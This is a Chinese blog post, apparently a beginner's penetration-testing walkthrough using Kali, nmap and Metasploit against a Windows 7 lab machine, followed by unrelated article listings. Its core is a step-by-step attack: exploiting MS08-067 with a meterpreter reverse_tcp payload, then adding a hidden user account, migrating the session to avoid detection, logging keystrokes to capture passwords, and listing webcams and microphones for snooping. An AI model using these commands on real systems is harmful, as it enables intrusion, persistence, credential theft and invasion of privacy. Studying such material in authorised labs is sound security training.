渗透测试实战

最新推荐文章于 2024-08-02 19:38:03 发布
最新推荐文章于 2024-08-02 19:38:03 发布
阅读量1.8k 收藏 54
点赞数 20
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45803006/article/details/130407290
版权

一.渗透测试案例

1.Metasploit(渗透测试神器)

下载kali,kali上有很多做渗透测试的驱动,该软件在kali中就有

专业术语

  • Exploit(渗透攻击):子弹头,利用系统,应用或者服务中的安全漏洞,所进行的攻击行为。流行的渗透攻击技术包括缓存区溢出、WEB应用程序漏洞攻击(SQL注入、XSS等),以及利用配置错误等。
  • Payload(攻击荷载):火药,被渗透攻击后去执行的代码,在Metasploit中可以自由选择、传送和植入。
  • ShellCode:是攻击荷载运行的一组机器指令,通常用汇编语言。
  • Module:使用的软件代码组件
  • Listener(监听器):是Metasploit中用来等待接入网络连接主机的组件。

常用术语

  • 肉鸡:傀儡机,可以随意被控制的电脑和服务器。
  • 木马:用来获取用户权限的程序或者代码段
  • 后门:方便二次进入系统留下的后门程序
  • 拿Shell:拿到对方的命令执行环境
  • webshell:通过web入侵的脚本工具,对网站服务进行一定程度的控制
  • poc:验证漏洞存在的代码或者程序
  • exp:漏洞利用的代码或者程序
  • Payload:有效攻击荷载,可以是一段代码,被隐藏并且秘密发送的信息。

2.主机漏洞利用演示

MS17-010 :永恒之蓝漏洞(勒索)

软件:Vmware Workstation 14

攻击机:kali

靶机环境:Win7

MS08-067 缓存区溢出漏洞

3.nmap 网络扫描工具

全名:network mapper

对ip地址段扫描 ,看目标网络上有哪些主机存活,哪些服务开放,甚至知道网络中用了哪种类型的防火墙设备

扫描命令:

 4.渗透测试操作

1.打开kali  

2.命令行输入msfconsole启动metasploit

3.输入nmap启动nmap

4.输入nmap -F 192.168.10.0/24进行扫描

5.需要在网络配置器中设置在同一个网段,在windows中自动获取

6.-F快速扫描出使用的端口,可以进行攻击

7.search ms08-067 查看漏洞是否有对应的攻击代码

8.use (对应代码)/(对应编号)

9.进入exploit攻击代码的模块中,添加攻击效果(设置PAYLOAD)

set PAYLOAD windows/meterpreter/reverse_tcp

功能为反转tcp,针对windows,利用meterpreter神器,该神器中集成了很多指令,方便简单操作,打进去后,反弹一个tcp连接回来,拿到相应的Shell,shell隐藏在meterpreter

10.设置完后,输入show options查看参数,空白的需要填,

如图,需要设置RHOSTS和LHOST,RHOSTS目标主机,LHOST监听主机

11.分别输入set RHOSTS 目标地址

                   set LHOST 自己的地址

12.输入run或者exploit则开始攻击

 出现该页面表示入侵成功  在自己电脑的4444端口接受,对对方的445端口进行攻击

13.输入ps可以查看被攻击电脑的进程

输入getuid 显示自己拿到了最高权限SYSTEM

输入shell进入对方电脑的命令行(system32):里面存放了大量的工具

输入net user 查看用户

输入net user HVV 123456 /add 可以添加用户(提升为管理员,隐藏)

细思极恐,如果电脑系统中存在一些未公布的漏洞,则自己的电脑是非常危险的。

最后输入exit退出windows命令行进入到神器中。

14.在meterpreter中输入webcam_

在输入webcam_list 可以查看摄像头

输入ps 可以查看运行的进程

该进程表示桌面

15. 输入migrate 1996 本身产生的session是留有痕迹的 而输入该命令可以将session迁移到桌面,伴生。不容易被干掉。

输入key

输入keyscan_start开启键盘的监听

当对方的键盘产生输入(可能输入某平台账号密码)

输入keyscan_dump此时在命令行显示了被攻击电脑键盘所输入的内容

16.类似操作很多,监听麦克风,摄像头,可以弹记事本。

附送
关注
  • 20
    点赞
  • 54
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kali渗透测试技术实战
02-21
这本书主要介绍了kali的一些工具使用方法,以及linux的一些基本操作
Kali Linux渗透测试实战
03-10
Kali Linux渗透测试实战 如果您之前使用过或者了解BackTrack系列Linux的话,那么我只需要简单的说,Kali是BackTrack的升级换代产品, 从Kali开始,BackTrack将成为历史。如果您没接触过BackTrack也没关系,我们从头...
KaLi做木马渗透实战案例
开摆工作室(kbai.cc)
04-04 4824
KaLi做木马渗透实战案例
Kali渗透实战:5步带你搞懂网络数据的嗅探与欺骗!
admin_man的博客
06-12 1278
如果你想彻底了解一个网络,最好的办法就是对网络中的流量进行嗅探
msf渗透测试学习-与永恒之蓝漏洞案例
weixin_49349476的博客
06-08 4621
MSF是Metasploit Framework的缩写,是一款广泛使用的渗透测试工具,具有强大的攻击功能。它提供了一个模块化的平台,通过将各种攻击载荷、漏洞利用和辅助工具组装在一起,可用于模拟各种攻击,测试系统安全性,也可以用于执行红队实战训练、漏洞挖掘等工作。
网络安全|渗透测试入门案例分析,从零基础入门到精通—登录框页面的快速渗透常用检测手段
Jum的博客
06-21 1984
随着平台的多样性,用户需求的不断提高,为了方便用户通过一次性用户身份验证登录多个应用程序和网站,大多数平台都会使用 SSO 系统。在后端机制中,存在一个安全错误配置,它没有检查是否是为特定应用程序生成的 JWT 令牌——相反,它接受任何具有有效签名的 JWT 令牌。可以手动测试例如下面的一些高频弱口令,2.根据网站所使用的第三方组件,寻找特定的弱口令或默认口令进行登录。或者直接BP走一波。在网站后台登录的页面常用的渗透办法今天给大家分享一下,这样更好的让大家在日常维护网站的时候好注意在各个方便进行防御。
Kali Linux渗透测试基础入门到进阶实战全程课
09-29
课程标题:Kali Linux渗透测试基础入门到进阶实战全程课一、课程声明       本课程所有分享仅做学习交流,切勿用于任何不法用途,请每位学员自觉遵守网络安全法等法律法规!二、课程概要       本课程主要分享Kali Linux渗透测试基础入门到进阶实战全程技巧!三、适合人员       1、零基础大学生       2、IT技术人员       3、运维工程师       4、渗透测试工程师       5、漏洞挖掘工程师四、特别说明       1、本课程支持一次购买,永久观看!       2、本课系讲师原创课程,请勿盗用!
一次渗透测试实战
热门推荐
m0_46467017的博客
04-23 2万+
一次渗透测试实战前言信息收集漏洞验证漏洞攻击Grafana任意文件读取漏洞(CVE-2021-43798)一、漏洞描述二、漏洞影响范围Payload:ActiveMQ 任意文件上传漏洞(CVE-2016-3088)一、漏洞描述二、漏洞影响范围三、漏洞利用:写入webshell权限提升CVE-2021-4034 Linux polkit 提权漏洞一、漏洞描述二、影响版本三、漏洞利用总结 前言 学习了一两个月的安全,为了对自己的一个学习水平做一个总结,所以我特地找来一个网站来进行一次渗透实战。 信息收集 这次的
app渗透测试实战Getshell
good good study
05-17 8024
分享一下今天对某app的合法渗透测试,从基础的信息收集到拿到网站的shell的过程。
渗透测试实战Vulnhub-Lampiao
weixin_44558065的博客
06-22 1593
目录 一、设计概述 1.1、渗透测试的意义 1.2、渗透测试的目的 二、需求分析 2.1、用户需求分析 2.2、渗透测试 三、方案规划与实施 3.1、信息收集 3.1.1 Nmap扫描 3.1.2 wpscan扫描 3.1.4 webdirscan目录扫描 3.2 漏洞分析 3.2.1 漏洞名称 3.2.2 漏洞概述 3.2.3 漏洞点 3.2.4 漏洞触发流程 3.2.5 漏洞利用 3.2.6 修复意见 3.3 web渗透 一、设计概述 1.1、渗透测试的意义 信息安全等级保护的要求 2015年12月2
Kali Linux】高级渗透测试实战
小洁洁
09-01 5424
>对于企业网络安全建设工作的质量保障,业界普遍遵循PDCA(计划(Plan)、实施(Do)、检查(Check)、处理(Act))的方法论。近年来,网络安全攻防对抗演练发挥了越来越重要的作用。企业的安全管理者通过组织内部或外部攻击队,站在恶意攻击者的视角,识别自身网络安全建设过程中的防护短板,检验安全应急预案的有效性并持续优化,为业务发展提供更强的保驾护航能力。
xsser_platform:《 Web安全攻防:渗透测试实战指南》 XSS测试平台原始码
03-23
这个平台是《Web安全攻防:渗透测试实战指南》一书中的实践工具,提供了对XSS漏洞进行探测和分析的功能。"原始码"表明这是该平台的源代码,意味着我们可以深入了解其工作原理并根据需要进行定制或扩展。 【描述详解...
鸿蒙系统开发【加解密】安全
2301_76813281的博客
08-02 616
本示例使用cryptoFramework接口的Cipher对象相关方法实现了字符串加解密算法,包括RSA加密算法与AES加密算法。
鸿蒙系统开发【加解密算法库框架】安全
2301_76813281的博客
08-02 738
本示例使用@ohos.security.cryptoFramework相关接口实现了对文本文件的加解密、签名验签操作。
发送邮箱调用接口时需要注意哪些安全事项?
DengHua2203的博客
08-02 280
发送邮箱调用接口时,确保安全性是一个复杂而重要的任务。通过以上措施,可以显著提高接口的安全性。AokSend,发送邮箱调用接口,API与SMTP无缝对接,一键触发,邮件秒达,营销快人一步!
鸿蒙系统开发【ASN.1密文转换】安全
最新发布
2301_76813281的博客
08-02 465
本示例对使用@kit.CryptoArchitectureKit加密后的密文格式进行转换。@kit.CryptoArchitectureKit加密后的密文格式默认为以base64显示的ASN.1格式问题,通过对密文进行base64变换后得到字符数组,以16进制数字显示,再此基础上进行密文格式转换,从ASN.1格式转换为c1c3c2格式的裸密文,再以c1c3c2格式的裸密文进行解密,以验证密文转换的正确性。
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1654
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
kali渗透测试实战项目
08-26
Kali渗透测试实战项目是一种以Kali Linux为基础的实际渗透测试项目,旨在模拟真实的网络环境并测试其安全性。这种项目通常由安全团队或专业渗透测试人员执行,以识别潜在的漏洞和弱点,并提供解决方案来加强网络的安全性。 在Kali渗透测试实战项目中,渗透测试人员将使用各种工具和技术来模拟攻击者的行为,以评估目标系统的安全性。这可能包括网络侦察、漏洞扫描、密码破解、社交工程等。通过这些活动,渗透测试人员可以发现系统中的薄弱点,并向组织提供修复建议以提高其安全性。 需要注意的是,进行Kali渗透测试实战项目时必须获得合法授权,并遵守法律和道德准则。此外,项目执行过程中还应与相关的组织或个人进行充分的沟通和协商,确保双方的利益得到保护。 总之,Kali渗透测试实战项目是一种有助于提高网络安全性的实际实践活动,通过模拟真实攻击场景来评估和加强系统的安全防护能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值